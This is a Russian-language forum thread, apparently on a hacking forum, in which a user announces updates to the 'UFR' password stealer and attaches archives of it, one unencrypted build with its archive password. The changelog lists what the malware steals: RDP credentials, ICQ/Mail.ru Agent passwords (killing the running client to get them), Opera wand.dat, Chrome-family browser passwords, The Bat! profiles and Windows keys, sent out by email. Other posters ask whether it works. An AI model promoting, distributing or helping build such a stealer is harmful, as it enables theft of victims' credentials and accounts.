UFR v3.1.1.0/3.1.2.0


Статус
Закрыто для дальнейших ответов.

ashoka

Уважаемый пользователь
Форумчанин
Регистрация
04.01.2013
Сообщения
270
Репутация
145
s020.radikal.ru_i718_1301_b2_5442312ac39e.png



Апдейт от 31 декабря.

Небольшой апдейт стилера. Запилен стилинг RDP-подключений из Credentials и из rdp файлов, которые стилер ищет на десктопе и в моих документах. Добавлен стилинг восьмой асечки. Вот тут я был разочарован шо пиздец - под именем новой асечки впихивают всё тот же говномагент, в общем быдлота - чо еще сказать. Еще по поводу магента/icq8 - учитывая то ли секурность, то ли *** знает чо еще - пароли из магенто-шняги не слить, пока запущена эта самая магенто-шняга. До этого апдейта при запуске стилер если и находил пароли - слить их не мог, теперь же если магенто-шняга запущена - мы её рубим на*** и сливаем пароли. Некошерно как-то, но вполне работоспособно.
Еще из фиксов - добавлена поддержка оперы x64, эта мозгоёбная детина создает папку с другим именем ("Opera x64"). Еще по поводу шысят-штырёх бит - под ними ключ венды не тянулся, терь тут всё работает отлично. В общем это качественный, а не количественный илитно-релизенг.


Небольшой апдейт. Первое - добавлен выбор порта при отправке на мыло. Просьба тем, кто просил - затестить тест и отписать письмо. Второе из добавленного - детект x64 венды во вкладке сисинфо. Мелочь, а приятно.

Теперь о фиксах, самый цимес спрятался тут. Первое - стилинг The Bat! улучшен, теперь не пропускает профили. Второе - фикс фикса Оперы x64, прошлый фикс мог не детектить путь к профилю Оперы (самая вкуснота, место хранения wand.dat). Ну и я щитаю самое главное - фикс хромоподобных высерков. Проблема была в том, что если в этих самых хромовысерках сохранены пароли от сайтов, которые на ASP.NET писаны - билд делал бочку (,SEH таки работает!!!1!1!1!!), тем самым скипая остальные пароли в этом конкретном хромовысерке. В общем парсинг переписан считай что заново..

Вам нужно авторизоваться, чтобы просмотреть содержимое.
 

Вложения

  • UFR_3.zip
    974.6 КБ · Просмотры: 49

xatop

old root
Форумчанин
Регистрация
13.03.2013
Сообщения
103
Репутация
185
Имя ОС
Microsoft Windows Server 2008 R2 Standard
Версия 6.1.7601 Service Pack 3 Сборка 7601
Аппаратно-зависимый уровень (HAL) Версия = "6.1.7601.17514"
так у меня нихрена стилер этот не скоммуячил, при том, что антивируса нет вообще:
noav.JPG
 
N

Nepecheg

Гость
интересненько
кто уже тестил?
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
вазонезовского UFR стилера.И сегодняшний релиз UFR_3154_nocrypt.
Пасс на архив:111
 

Вложения

  • UFR_3154_nocrypt.rar
    976.7 КБ · Просмотры: 26
Последнее редактирование:
S

stasuk25

Гость
Актуально с Гугл Хромом?
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 082
Репутация
8 199
Статус
Закрыто для дальнейших ответов.
Автор темы Похожие темы Форум Ответы Дата
ashoka Компьютерные вирусы 0
Похожие темы
UFR Dubl Killer
Верх Низ